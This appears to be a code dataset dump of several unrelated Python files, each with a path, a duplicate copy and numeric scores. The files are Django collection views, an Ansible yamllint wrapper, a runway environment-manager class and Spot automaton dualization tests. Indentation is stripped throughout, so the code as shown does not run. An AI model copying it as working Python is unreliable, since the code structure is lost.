url = '%s?addon_id=%s' % (reverse('collections.ajax_list'), addon.id)
else:
url = collection.get_url_path()
return http.HttpResponseRedirect(url)
@write
@login_required
@post_required
def ajax_collection_alter(request, action):
try:
c = get_object_or_404(Collection.objects, pk=request.POST['id'])
except (ValueError, KeyError):
return http.HttpResponseBadRequest()
return change_addon(request, c, action)
@write
@login_required
# Contributors are allowed to *see* the page, but there is another
# permission check below to prevent them from doing any modifications.
@owner_required(require_owner=False)
def edit(request, collection, username, slug):
is_admin = acl.action_allowed(request, 'Collections', 'Edit')
if not acl.check_collection_ownership(
request, collection, require_owner=True):
if request.method == 'POST':
raise PermissionDenied
form = None
elif request.method == 'POST':
initial = initial_data_from_request(request)
if collection.author_id: # Don't try to change the author.
initial['author'] = collection.author
form = forms.CollectionForm(request.POST, request.FILES,
initial=initial,
instance=collection)
if form.is_valid():
collection = form.save()
collection_message(request, collection, 'update')
log.info(u'%s edited collection %s' %
(request.user, collection.id))
return http.HttpResponseRedirect(collection.edit_url())
else:
form = forms.CollectionForm(instance=collection)
qs = (CollectionAddon.objects.no_cache().using('default')
.filter(collection=collection))
meta = dict((c.addon_id, c) for c in qs)
addons = collection.addons.no_cache().all()
comments = get_notes(collection, raw=True).next()
if is_admin:
initial = dict(type=collection.type,
application=collection.application)
admin_form = forms.AdminForm(initial=initial)
else:
admin_form = None
data = dict(collection=collection,
form=form,
username=username,
slug=slug,
meta=meta,
filter=get_filter(request),
is_admin=is_admin,
admin_form=admin_form,
addons=addons,
comments=comments)
return render_cat(request, 'bandwagon/edit.html', data)
@write
@login_required
@owner_required(require_owner=False)
@post_required
def edit_addons(request, collection, username, slug):
if request.method == 'POST':
form = forms.AddonsForm(request.POST)
if form.is_valid():
form.save(collection)
collection_message(request, collection, 'update')
log.info(u'%s added add-ons to %s' %
(request.user, collection.id))
return http.HttpResponseRedirect(collection.edit_url() + '#addons-edit')
@write
@login_required
@owner_required
@post_required
def edit_contributors(request, collection, username, slug):
is_admin = acl.action_allowed(request, 'Collections', 'Edit')
if is_admin:
admin_form = forms.AdminForm(request.POST)
if admin_form.is_valid():
admin_form.save(collection)
form = forms.ContributorsForm(request.POST)
if form.is_valid():
form.save(collection)
collection_message(request, collection, 'update')
if form.cleaned_data['new_owner']:
return http.HttpResponseRedirect(collection.get_url_path())
return http.HttpResponseRedirect(collection.edit_url() + '#users-edit')
@write
@login_required
@owner_required
@post_required
def edit_privacy(request, collection, username, slug):
collection.listed = not collection.listed
collection.save()
log.info(u'%s changed privacy on collection %s' %
(request.user, collection.id))
return http.HttpResponseRedirect(collection.get_url_path())
@write
@login_required
def delete(request, username, slug):
collection = get_object_or_404(Collection, author__username=username,
slug=slug)
if not acl.check_collection_ownership(request, collection, True):
log.info(u'%s is trying to delete collection %s'
% (request.user, collection.id))
raise PermissionDenied
data = dict(collection=collection, username=username, slug=slug)
if request.method == 'POST':
if request.POST['sure'] == '1':
collection.delete()
log.info(u'%s deleted collection %s' %
(request.user, collection.id))
url = reverse('collections.user', args=[username])
return http.HttpResponseRedirect(url)
else:
return http.HttpResponseRedirect(collection.get_url_path())
return render_cat(request, 'bandwagon/delete.html', data)
@require_POST
@write
@login_required
@owner_required
@json_view
@csrf_protect
def delete_icon(request, collection, username, slug):
log.debug(u"User deleted collection (%s) icon " % slug)
tasks.delete_icon(os.path.join(collection.get_img_dir(),
'%d.png' % collection.id))
collection.icontype = ''
collection.save()
if request.is_ajax():
return {'icon': collection.icon_url}
else:
messages.success(request, _('Icon Deleted'))
return http.HttpResponseRedirect(collection.edit_url())
@login_required
@post_required
@json_view
def watch(request, username, slug):
"""
POST /collections/:user/:slug/watch to toggle the user's watching status.
For ajax, return {watching: true|false}. (reflects the new value)
Otherwise, redirect to the collection page.
"""
collection = get_collection(request, username, slug)
d = dict(user=request.user, collection=collection)
qs = CollectionWatcher.objects.no_cache().using('default').filter(**d)
watching = not qs # Flip the bool since we're about to change it.
if qs:
qs.delete()
else:
CollectionWatcher.objects.create(**d)
if request.is_ajax():
return {'watching': watching}
else:
return http.HttpResponseRedirect(collection.get_url_path())
@login_required
@non_atomic_requests
def following(request):
qs = (Collection.objects.filter(following__user=request.user)
.order_by('-following__created'))
collections = paginate(request, qs)
votes = get_votes(request, collections.object_list)
return render_cat(request, 'bandwagon/user_listing.html',
dict(collections=collections, votes=votes,
page='following', filter=get_filter(request)))
@login_required
@allow_mine
@non_atomic_requests
def mine(request, username=None, slug=None):
if slug is None:
return user_listing(request, username)
else:
return collection_detail(request, username, slug) | 0.399929 | 0.056888 |
"""Wrapper around yamllint that supports YAML embedded in Ansible modules."""
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import ast
import json
import os
import re
import sys
import yaml
from yaml.resolver import Resolver
from yaml.constructor import SafeConstructor
from yaml.error import MarkedYAMLError
from _yaml import CParser # pylint: disable=no-name-in-module
from yamllint import linter
from yamllint.config import YamlLintConfig
def main():
"""Main program body."""
paths = sys.argv[1:] or sys.stdin.read().splitlines()
checker = YamlChecker()
checker.check(paths)
checker.report()
class TestConstructor(SafeConstructor):
"""Yaml Safe Constructor that knows about Ansible tags"""
def construct_yaml_unsafe(self, node):
try:
constructor = getattr(node, 'id', 'object')
if constructor is not None:
constructor = getattr(self, 'construct_%s' % constructor)
except AttributeError:
constructor = self.construct_object
value = constructor(node)
return value
TestConstructor.add_constructor(
u'!unsafe',
TestConstructor.construct_yaml_unsafe)
TestConstructor.add_constructor(
u'!vault',
TestConstructor.construct_yaml_str)
TestConstructor.add_constructor(
u'!vault-encrypted',
TestConstructor.construct_yaml_str)
class TestLoader(CParser, TestConstructor, Resolver):
def __init__(self, stream):
CParser.__init__(self, stream)
TestConstructor.__init__(self)
Resolver.__init__(self)
class YamlChecker:
"""Wrapper around yamllint that supports YAML embedded in Ansible modules."""
def __init__(self):
self.messages = []
def report(self):
"""Print yamllint report to stdout."""
report = dict(
messages=self.messages,
)
print(json.dumps(report, indent=4, sort_keys=True))
def check(self, paths):
"""
:type paths: t.List[str]
"""
config_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'config')
yaml_conf = YamlLintConfig(file=os.path.join(config_path, 'default.yml'))
module_conf = YamlLintConfig(file=os.path.join(config_path, 'modules.yml'))
plugin_conf = YamlLintConfig(file=os.path.join(config_path, 'plugins.yml'))
for path in paths:
extension = os.path.splitext(path)[1]
with open(path) as f:
contents = f.read()
if extension in ('.yml', '.yaml'):
self.check_yaml(yaml_conf, path, contents)
elif extension == '.py':
if path.startswith('lib/ansible/modules/') or path.startswith('plugins/modules/'):
conf = module_conf
else:
conf = plugin_conf
self.check_module(conf, path, contents)
else:
raise Exception('unsupported extension: %s' % extension)
def check_yaml(self, conf, path, contents):
"""
:type conf: YamlLintConfig
:type path: str
:type contents: str
"""
self.check_parsable(path, contents)
self.messages += [self.result_to_message(r, path) for r in linter.run(contents, conf, path)]
def check_module(self, conf, path, contents):
"""
:type conf: YamlLintConfig
:type path: str
:type contents: str
"""
docs = self.get_module_docs(path, contents)
for key, value in docs.items():
yaml_data = value['yaml']
lineno = value['lineno']
fmt = value['fmt']
if fmt != 'yaml':
continue
if yaml_data.startswith('\n'):
yaml_data = yaml_data[1:]
lineno += 1
self.check_parsable(path, yaml_data, lineno)
messages = list(linter.run(yaml_data, conf, path))
self.messages += [self.result_to_message(r, path, lineno - 1, key) for r in messages]
def check_parsable(self, path, contents, lineno=1):
"""
:type path: str
:type contents: str
:type lineno: int
"""
try:
yaml.load(contents, Loader=TestLoader)
except MarkedYAMLError as e:
self.messages += [{'code': 'unparsable-with-libyaml',
'message': '%s - %s' % (e.args[0], e.args[2]),
'path': path,
'line': e.problem_mark.line + lineno,
'column': e.problem_mark.column + 1,
'level': 'error',
}]
@staticmethod
def result_to_message(result, path, line_offset=0, prefix=''):
"""
:type result: any
:type path: str
:type line_offset: int
:type prefix: str
:rtype: dict[str, any]
"""
if prefix:
prefix = '%s: ' % prefix
return dict(
code=result.rule or result.level,
message=prefix + result.desc,
path=path,
line=result.line + line_offset,
column=result.column,
level=result.level,
)
def get_module_docs(self, path, contents):
"""
:type path: str
:type contents: str
:rtype: dict[str, any]
"""
module_doc_types = [
'DOCUMENTATION',
'EXAMPLES',
'RETURN',
]
docs = {}
fmt_re = re.compile(r'^# fmt:\s+(\S+)')
def check_assignment(statement, doc_types=None):
"""Check the given statement for a documentation assignment."""
for target in statement.targets:
if not isinstance(target, ast.Name):
continue
if doc_types and target.id not in doc_types:
continue
fmt_match = fmt_re.match(statement.value.s.lstrip())
fmt = 'yaml'
if fmt_match:
fmt = fmt_match.group(1)
docs[target.id] = dict(
yaml=statement.value.s,
lineno=statement.lineno,
end_lineno=statement.lineno + len(statement.value.s.splitlines()),
fmt=fmt.lower(),
)
module_ast = self.parse_module(path, contents)
if not module_ast:
return {}
is_plugin = path.startswith('lib/ansible/modules/') or path.startswith('lib/ansible/plugins/') or path.startswith('plugins/')
is_doc_fragment = path.startswith('lib/ansible/plugins/doc_fragments/') or path.startswith('plugins/doc_fragments/')
if is_plugin and not is_doc_fragment:
for body_statement in module_ast.body:
if isinstance(body_statement, ast.Assign):
check_assignment(body_statement, module_doc_types)
elif is_doc_fragment:
for body_statement in module_ast.body:
if isinstance(body_statement, ast.ClassDef):
for class_statement in body_statement.body:
if isinstance(class_statement, ast.Assign):
check_assignment(class_statement)
else:
raise Exception('unsupported path: %s' % path)
return docs
def parse_module(self, path, contents):
"""
:type path: str
:type contents: str
:rtype: ast.Module | None
"""
try:
return ast.parse(contents)
except SyntaxError as ex:
self.messages.append(dict(
code='python-syntax-error',
message=str(ex),
path=path,
line=ex.lineno,
column=ex.offset,
level='error',
))
except Exception as ex: # pylint: disable=broad-except
self.messages.append(dict(
code='python-parse-error',
message=str(ex),
path=path,
line=0,
column=0,
level='error',
))
return None
if __name__ == '__main__':
main() | venv/lib/python3.6/site-packages/ansible_test/_data/sanity/yamllint/yamllinter.py | """Wrapper around yamllint that supports YAML embedded in Ansible modules."""
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import ast
import json
import os
import re
import sys
import yaml
from yaml.resolver import Resolver
from yaml.constructor import SafeConstructor
from yaml.error import MarkedYAMLError
from _yaml import CParser # pylint: disable=no-name-in-module
from yamllint import linter
from yamllint.config import YamlLintConfig
def main():
"""Main program body."""
paths = sys.argv[1:] or sys.stdin.read().splitlines()
checker = YamlChecker()
checker.check(paths)
checker.report()
class TestConstructor(SafeConstructor):
"""Yaml Safe Constructor that knows about Ansible tags"""
def construct_yaml_unsafe(self, node):
try:
constructor = getattr(node, 'id', 'object')
if constructor is not None:
constructor = getattr(self, 'construct_%s' % constructor)
except AttributeError:
constructor = self.construct_object
value = constructor(node)
return value
TestConstructor.add_constructor(
u'!unsafe',
TestConstructor.construct_yaml_unsafe)
TestConstructor.add_constructor(
u'!vault',
TestConstructor.construct_yaml_str)
TestConstructor.add_constructor(
u'!vault-encrypted',
TestConstructor.construct_yaml_str)
class TestLoader(CParser, TestConstructor, Resolver):
def __init__(self, stream):
CParser.__init__(self, stream)
TestConstructor.__init__(self)
Resolver.__init__(self)
class YamlChecker:
"""Wrapper around yamllint that supports YAML embedded in Ansible modules."""
def __init__(self):
self.messages = []
def report(self):
"""Print yamllint report to stdout."""
report = dict(
messages=self.messages,
)
print(json.dumps(report, indent=4, sort_keys=True))
def check(self, paths):
"""
:type paths: t.List[str]
"""
config_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'config')
yaml_conf = YamlLintConfig(file=os.path.join(config_path, 'default.yml'))
module_conf = YamlLintConfig(file=os.path.join(config_path, 'modules.yml'))
plugin_conf = YamlLintConfig(file=os.path.join(config_path, 'plugins.yml'))
for path in paths:
extension = os.path.splitext(path)[1]
with open(path) as f:
contents = f.read()
if extension in ('.yml', '.yaml'):
self.check_yaml(yaml_conf, path, contents)
elif extension == '.py':
if path.startswith('lib/ansible/modules/') or path.startswith('plugins/modules/'):
conf = module_conf
else:
conf = plugin_conf
self.check_module(conf, path, contents)
else:
raise Exception('unsupported extension: %s' % extension)
def check_yaml(self, conf, path, contents):
"""
:type conf: YamlLintConfig
:type path: str
:type contents: str
"""
self.check_parsable(path, contents)
self.messages += [self.result_to_message(r, path) for r in linter.run(contents, conf, path)]
def check_module(self, conf, path, contents):
"""
:type conf: YamlLintConfig
:type path: str
:type contents: str
"""
docs = self.get_module_docs(path, contents)
for key, value in docs.items():
yaml_data = value['yaml']
lineno = value['lineno']
fmt = value['fmt']
if fmt != 'yaml':
continue
if yaml_data.startswith('\n'):
yaml_data = yaml_data[1:]
lineno += 1
self.check_parsable(path, yaml_data, lineno)
messages = list(linter.run(yaml_data, conf, path))
self.messages += [self.result_to_message(r, path, lineno - 1, key) for r in messages]
def check_parsable(self, path, contents, lineno=1):
"""
:type path: str
:type contents: str
:type lineno: int
"""
try:
yaml.load(contents, Loader=TestLoader)
except MarkedYAMLError as e:
self.messages += [{'code': 'unparsable-with-libyaml',
'message': '%s - %s' % (e.args[0], e.args[2]),
'path': path,
'line': e.problem_mark.line + lineno,
'column': e.problem_mark.column + 1,
'level': 'error',
}]
@staticmethod
def result_to_message(result, path, line_offset=0, prefix=''):
"""
:type result: any
:type path: str
:type line_offset: int
:type prefix: str
:rtype: dict[str, any]
"""
if prefix:
prefix = '%s: ' % prefix
return dict(
code=result.rule or result.level,
message=prefix + result.desc,
path=path,
line=result.line + line_offset,
column=result.column,
level=result.level,
)
def get_module_docs(self, path, contents):
"""
:type path: str
:type contents: str
:rtype: dict[str, any]
"""
module_doc_types = [
'DOCUMENTATION',
'EXAMPLES',
'RETURN',
]
docs = {}
fmt_re = re.compile(r'^# fmt:\s+(\S+)')
def check_assignment(statement, doc_types=None):
"""Check the given statement for a documentation assignment."""
for target in statement.targets:
if not isinstance(target, ast.Name):
continue
if doc_types and target.id not in doc_types:
continue
fmt_match = fmt_re.match(statement.value.s.lstrip())
fmt = 'yaml'
if fmt_match:
fmt = fmt_match.group(1)
docs[target.id] = dict(
yaml=statement.value.s,
lineno=statement.lineno,
end_lineno=statement.lineno + len(statement.value.s.splitlines()),
fmt=fmt.lower(),
)
module_ast = self.parse_module(path, contents)
if not module_ast:
return {}
is_plugin = path.startswith('lib/ansible/modules/') or path.startswith('lib/ansible/plugins/') or path.startswith('plugins/')
is_doc_fragment = path.startswith('lib/ansible/plugins/doc_fragments/') or path.startswith('plugins/doc_fragments/')
if is_plugin and not is_doc_fragment:
for body_statement in module_ast.body:
if isinstance(body_statement, ast.Assign):
check_assignment(body_statement, module_doc_types)
elif is_doc_fragment:
for body_statement in module_ast.body:
if isinstance(body_statement, ast.ClassDef):
for class_statement in body_statement.body:
if isinstance(class_statement, ast.Assign):
check_assignment(class_statement)
else:
raise Exception('unsupported path: %s' % path)
return docs
def parse_module(self, path, contents):
"""
:type path: str
:type contents: str
:rtype: ast.Module | None
"""
try:
return ast.parse(contents)
except SyntaxError as ex:
self.messages.append(dict(
code='python-syntax-error',
message=str(ex),
path=path,
line=ex.lineno,
column=ex.offset,
level='error',
))
except Exception as ex: # pylint: disable=broad-except
self.messages.append(dict(
code='python-parse-error',
message=str(ex),
path=path,
line=0,
column=0,
level='error',
))
return None
if __name__ == '__main__':
main() | 0.543833 | 0.167729 |
from __future__ import annotations
import logging
import os
import platform
import shutil
import sys
from pathlib import Path
from typing import TYPE_CHECKING, Any, Generator, Optional, Tuple, Union, cast
from ..compat import cached_property
if TYPE_CHECKING:
from urllib.error import URLError
from runway._logging import RunwayLogger
LOGGER = cast("RunwayLogger", logging.getLogger(__name__))
def handle_bin_download_error(exc: URLError, name: str) -> None:
"""Give user info about their failed download.
Raises:
SystemExit: Always raised after logging reason.
"""
url_error_msg = str(exc.reason)
if "CERTIFICATE_VERIFY_FAILED" not in url_error_msg:
raise exc
LOGGER.error(
"Attempted to download %s but was unable to verify the TLS "
"certificate on its download site.",
name,
)
LOGGER.error("Full TLS error message: %s", url_error_msg)
if platform.system().startswith("Darwin") and (
"unable to get local issuer certificate" in url_error_msg
):
LOGGER.error(
"This is likely caused by your Python installation missing root certificates. "
'Run "/Applications/Python %s.%s/"Install Certificates.command" to fix it '
"(https://stackoverflow.com/a/42334357/2547802)",
sys.version_info[0],
sys.version_info[1],
)
sys.exit(1)
class EnvManager:
"""Base environment manager class.
Attributes:
binPath to the binary of the current version.
current_version: The current binary version being used.
env_dir_name: Name of the directory within the users home
directory where binary versions will be stored.
path: The current working directory.
"""
_bin_name: str
current_version: Optional[str]
env_dir_name: str
path: Path
def __init__(
self, bin_name: str, dir_name: str, path: Optional[Path] = None
) -> None:
"""Initialize class.
Args:
bin_name: Name of the binary file (e.g. kubectl)
dir_name: Name of the directory within the users home
directory where binary versions will be stored.
path: The current working directory.
"""
self._bin_name = bin_name + self.command_suffix
self.current_version = None
self.env_dir_name = (
dir_name if platform.system() == "Windows" else "." + dir_name
)
self.path = Path.cwd() if not path else path
@property
def bin(self) -> Path:
"""Path to the version binary.
Returns:
Path
"""
if self.current_version:
return self.versions_dir / self.current_version / self._bin_name
return self.versions_dir / self._bin_name
@cached_property
def command_suffix(self) -> str: # pylint: disable=no-self-use
"""Return command suffix based on platform.system."""
if platform.system() == "Windows":
return ".exe"
return ""
@cached_property
def env_dir(self) -> Path:
"""Return the directory used to store version binaries."""
if platform.system() == "Windows":
if "APPDATA" in os.environ:
return Path(os.environ["APPDATA"]) / self.env_dir_name
return Path.home() / "AppData" / "Roaming" / self.env_dir_name
return Path.home() / self.env_dir_name
@cached_property
def versions_dir(self) -> Path:
"""Return the directory used to store binary.
When first used, the existence of the directory is checked and it is
created if needed.
"""
return self.env_dir / "versions"
@cached_property
def version_file(self) -> Optional[Path]:
"""Find and return a "<bin version file>" file if one is present.
Returns:
Path to the <bin> version file.
"""
raise NotImplementedError
def install(self, version_requested: Optional[str] = None) -> str:
"""Ensure <bin> is installed."""
raise NotImplementedError
def list_installed(self) -> Generator[Path, None, None]:
"""List installed versions of <bin>."""
raise NotImplementedError
def uninstall(self, version: Union[str, Tuple[Any, ...]]) -> bool:
"""Uninstall a version of the managed binary.
Args:
version: Version of binary to uninstall.
Returns:
Whether a version of the binary was uninstalled or not.
"""
version_dir = self.versions_dir / str(version)
if version_dir.is_dir():
LOGGER.notice(
"uninstalling %s %s from %s...",
self._bin_name,
version,
self.versions_dir,
)
shutil.rmtree(version_dir)
LOGGER.success("uninstalled %s %s", self._bin_name, version)
return True
LOGGER.error("%s %s not installed", self._bin_name, version)
return False | runway/env_mgr/__init__.py | from __future__ import annotations
import logging
import os
import platform
import shutil
import sys
from pathlib import Path
from typing import TYPE_CHECKING, Any, Generator, Optional, Tuple, Union, cast
from ..compat import cached_property
if TYPE_CHECKING:
from urllib.error import URLError
from runway._logging import RunwayLogger
LOGGER = cast("RunwayLogger", logging.getLogger(__name__))
def handle_bin_download_error(exc: URLError, name: str) -> None:
"""Give user info about their failed download.
Raises:
SystemExit: Always raised after logging reason.
"""
url_error_msg = str(exc.reason)
if "CERTIFICATE_VERIFY_FAILED" not in url_error_msg:
raise exc
LOGGER.error(
"Attempted to download %s but was unable to verify the TLS "
"certificate on its download site.",
name,
)
LOGGER.error("Full TLS error message: %s", url_error_msg)
if platform.system().startswith("Darwin") and (
"unable to get local issuer certificate" in url_error_msg
):
LOGGER.error(
"This is likely caused by your Python installation missing root certificates. "
'Run "/Applications/Python %s.%s/"Install Certificates.command" to fix it '
"(https://stackoverflow.com/a/42334357/2547802)",
sys.version_info[0],
sys.version_info[1],
)
sys.exit(1)
class EnvManager:
"""Base environment manager class.
Attributes:
binPath to the binary of the current version.
current_version: The current binary version being used.
env_dir_name: Name of the directory within the users home
directory where binary versions will be stored.
path: The current working directory.
"""
_bin_name: str
current_version: Optional[str]
env_dir_name: str
path: Path
def __init__(
self, bin_name: str, dir_name: str, path: Optional[Path] = None
) -> None:
"""Initialize class.
Args:
bin_name: Name of the binary file (e.g. kubectl)
dir_name: Name of the directory within the users home
directory where binary versions will be stored.
path: The current working directory.
"""
self._bin_name = bin_name + self.command_suffix
self.current_version = None
self.env_dir_name = (
dir_name if platform.system() == "Windows" else "." + dir_name
)
self.path = Path.cwd() if not path else path
@property
def bin(self) -> Path:
"""Path to the version binary.
Returns:
Path
"""
if self.current_version:
return self.versions_dir / self.current_version / self._bin_name
return self.versions_dir / self._bin_name
@cached_property
def command_suffix(self) -> str: # pylint: disable=no-self-use
"""Return command suffix based on platform.system."""
if platform.system() == "Windows":
return ".exe"
return ""
@cached_property
def env_dir(self) -> Path:
"""Return the directory used to store version binaries."""
if platform.system() == "Windows":
if "APPDATA" in os.environ:
return Path(os.environ["APPDATA"]) / self.env_dir_name
return Path.home() / "AppData" / "Roaming" / self.env_dir_name
return Path.home() / self.env_dir_name
@cached_property
def versions_dir(self) -> Path:
"""Return the directory used to store binary.
When first used, the existence of the directory is checked and it is
created if needed.
"""
return self.env_dir / "versions"
@cached_property
def version_file(self) -> Optional[Path]:
"""Find and return a "<bin version file>" file if one is present.
Returns:
Path to the <bin> version file.
"""
raise NotImplementedError
def install(self, version_requested: Optional[str] = None) -> str:
"""Ensure <bin> is installed."""
raise NotImplementedError
def list_installed(self) -> Generator[Path, None, None]:
"""List installed versions of <bin>."""
raise NotImplementedError
def uninstall(self, version: Union[str, Tuple[Any, ...]]) -> bool:
"""Uninstall a version of the managed binary.
Args:
version: Version of binary to uninstall.
Returns:
Whether a version of the binary was uninstalled or not.
"""
version_dir = self.versions_dir / str(version)
if version_dir.is_dir():
LOGGER.notice(
"uninstalling %s %s from %s...",
self._bin_name,
version,
self.versions_dir,
)
shutil.rmtree(version_dir)
LOGGER.success("uninstalled %s %s", self._bin_name, version)
return True
LOGGER.error("%s %s not installed", self._bin_name, version)
return False | 0.805976 | 0.13012 |
import spot
import buddy
match_strings = [('is_buchi', 'is_co_buchi'),
('is_generalized_buchi', 'is_generalized_co_buchi'),
('is_all', 'is_none'),
('is_all', 'is_all'),
('is_buchi', 'is_all')]
# existential and universal are dual
# deterministic is self-dual
def dualtype(aut, dual):
if dual.acc().is_none():
return True
return (not spot.is_deterministic(aut) or spot.is_deterministic(dual))\
and (spot.is_universal(dual) or not aut.is_existential())\
and (dual.is_existential() or not spot.is_universal(aut))
def produce_phi(rg, n):
phi = []
while len(phi) < n:
phi.append(rg.next())
return phi
def produce_automaton(phi):
aut = []
for f in phi:
aut.append(spot.translate(f))
return aut
def test_aut(aut, d=None):
if d is None:
d = spot.dualize(aut)
aa = aut.acc()
da = d.acc()
complete = spot.is_complete(aut)
univ = aut.is_univ_dest(aut.get_init_state_number())
an = aut.num_states()
dn = d.num_states()
if not dualtype(aut, d):
return (False, 'Incorrect transition mode resulting of dual')
for p in match_strings:
if ((getattr(aa, p[0])() and getattr(da, p[1])())
or (getattr(aa, p[1])() and getattr(da, p[0])())):
return (True, '')
return (False, 'Incorrect acceptance type dual')
# Tests that a (deterministic) automaton and its complement have complementary
# languages.
# FIXME This test could be extended to non-deterministic automata with a
# dealternization procedure.
def test_complement(aut):
assert aut.is_deterministic()
d = spot.dualize(aut)
s = spot.product_or(aut, d)
assert spot.dualize(s).is_empty()
def test_assert(a, d=None):
t = test_aut(a, d)
if not t[0]:
print (t[1])
print (a.to_str('hoa'))
print (spot.dualize(a).to_str('hoa'))
assert False
aut = spot.translate('a')
test_assert(aut)
dual = spot.dualize(aut)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 3
Start: 1
AP: 1 "a"
acc-name: co-Buchi
Acceptance: 1 Fin(0)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic stutter-invariant very-weak
--BODY--
State: 0 {0}
[t] 0
State: 1
[0] 0
[!0] 2
State: 2
[t] 2
--END--"""
aut = spot.automaton("""
HOA: v1
States: 3
Start: 0
AP: 2 "a" "b"
acc-name: Buchi
Acceptance: 1 Inf(0)
properties: trans-labels explicit-labels state-acc
--BODY--
State: 0
[0] 1
[0] 2
State: 1 {0}
[0] 1
State: 2 {0}
[1] 2
--END--""")
test_assert(aut)
dual = spot.dualize(aut)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 4
Start: 0
AP: 2 "a" "b"
acc-name: co-Buchi
Acceptance: 1 Fin(0)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic univ-branch
--BODY--
State: 0
[!0] 3
[0] 1&2
State: 1 {0}
[0] 1
[!0] 3
State: 2 {0}
[1] 2
[!1] 3
State: 3
[t] 3
--END--"""
aut = spot.automaton("""
HOA: v1
States: 4
Start: 0&2
AP: 2 "a" "b"
acc-name: Buchi
Acceptance: 1 Inf(0)
properties: trans-labels explicit-labels state-acc univ-branch
--BODY--
State: 0
[0] 1
State: 1 {0}
[t] 1
State: 2
[1] 3
State: 3 {0}
[t] 3
--END--""")
test_assert(aut)
dual = spot.dualize(aut)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 2
Start: 1
AP: 2 "a" "b"
acc-name: all
Acceptance: 0 t
properties: trans-labels explicit-labels state-acc deterministic
--BODY--
State: 0
[t] 0
State: 1
[!0 | !1] 0
--END--"""
aut = spot.automaton("""
HOA: v1
States: 4
Start: 0&2
AP: 2 "a" "b"
Acceptance: 2 Inf(0) | Inf(1)
properties: trans-labels explicit-labels state-acc univ-branch
--BODY--
State: 0
[0] 1
State: 1 {0}
[t] 1
State: 2
[1] 3
State: 3 {1}
[t] 3
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 2
Start: 1
AP: 2 "a" "b"
acc-name: all
Acceptance: 0 t
properties: trans-labels explicit-labels state-acc deterministic
--BODY--
State: 0
[t] 0
State: 1
[!0 | !1] 0
--END--"""
aut = spot.automaton("""
HOA: v1
States: 4
Start: 0
AP: 2 "a" "b"
Acceptance: 1 Inf(0) | Fin(0)
properties: trans-labels explicit-labels state-acc
--BODY--
State: 0
[0] 1
State: 1 {0}
[0] 3
State: 2
[0] 3
State: 3 {0}
[t] 3
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 5
Start: 0
AP: 2 "a" "b"
acc-name: co-Buchi
Acceptance: 1 Fin(0)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic
--BODY--
State: 0 {0}
[0] 1
[!0] 4
State: 1 {0}
[0] 3
[!0] 4
State: 2 {0}
[0] 3
[!0] 4
State: 3 {0}
[t] 3
State: 4
[t] 4
--END--"""
aut = spot.automaton("""
HOA: v1
States: 3
Start: 0
AP: 2 "a" "b"
Acceptance: 2 Inf(0) & Fin(1)
properties: trans-labels explicit-labels state-acc
--BODY--
State: 0 {0}
[0&!1] 1
[0&1] 2
State: 1 {1}
[1] 1
[0&!1] 2
State: 2
[!0&!1] 0
[t] 2
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 4
Start: 0
AP: 2 "a" "b"
acc-name: Streett 1
Acceptance: 2 Fin(0) | Inf(1)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic univ-branch
--BODY--
State: 0 {0}
[0&!1] 1
[0&1] 2
[!0] 3
State: 1 {1}
[1] 1
[0&!1] 2
[!0&!1] 3
State: 2
[0 | 1] 2
[!0&!1] 0&2
State: 3
[t] 3
--END--"""
aut = spot.automaton("""
HOA: v1
States: 3
Start: 0
AP: 1 "a"
Acceptance: 1 Inf(0) | Fin(0)
properties: trans-labels explicit-labels state-acc complete
--BODY--
State: 0
[0] 1
[!0] 2
State: 1 {0}
[t] 1
State: 2
[t] 2
[0] 0
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 1
Start: 0
AP: 1 "a"
acc-name: none
Acceptance: 0 f
properties: trans-labels explicit-labels state-acc complete
properties: deterministic terminal
--BODY--
State: 0
[t] 0
--END--"""
aut = spot.automaton("""
HOA: v1
States: 3
Start: 0
AP: 1 "a"
Acceptance: 1 Inf(0) | Fin(0)
properties: trans-labels explicit-labels state-acc complete
--BODY--
State: 0
[0] 1
[!0] 2
State: 1 {0}
[t] 1
State: 2
[t] 2
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 1
Start: 0
AP: 1 "a"
acc-name: none
Acceptance: 0 f
properties: trans-labels explicit-labels state-acc complete
properties: deterministic terminal
--BODY--
State: 0
[t] 0
--END--"""
aut = spot.automaton("""
HOA: v1
States: 3
Start: 0
AP: 2 "a" "b"
Acceptance: 1 Inf(0)
properties: trans-labels explicit-labels trans-acc
--BODY--
State: 0
[0&1] 1
[0&!1] 2
State: 1
[t] 1 {0}
[0] 0
State: 2
[0] 2
--END--""")
dual = spot.dualize(aut)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 3
Start: 0
AP: 2 "a" "b"
acc-name: co-Buchi
Acceptance: 1 Fin(0)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic
--BODY--
State: 0
[0&1] 1
[!0 | !1] 2
State: 1 {0}
[t] 1
State: 2
[t] 2
--END--"""
aut = spot.automaton("""
HOA: v1
States: 3
Start: 0
AP: 1 "a"
Acceptance: 1 Fin(0)
properties: trans-labels explicit-labels state-acc
--BODY--
State: 0
[0] 1
[0] 2
State: 1 {0}
[0] 1
State: 2
[t] 2
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 2
Start: 0
AP: 1 "a"
acc-name: Buchi
Acceptance: 1 Inf(0)
properties: trans-labels explicit-labels state-acc deterministic
--BODY--
State: 0
[!0] 1
State: 1 {0}
[t] 1
--END--"""
aut = spot.automaton("""
HOA: v1
States: 4
Start: 0
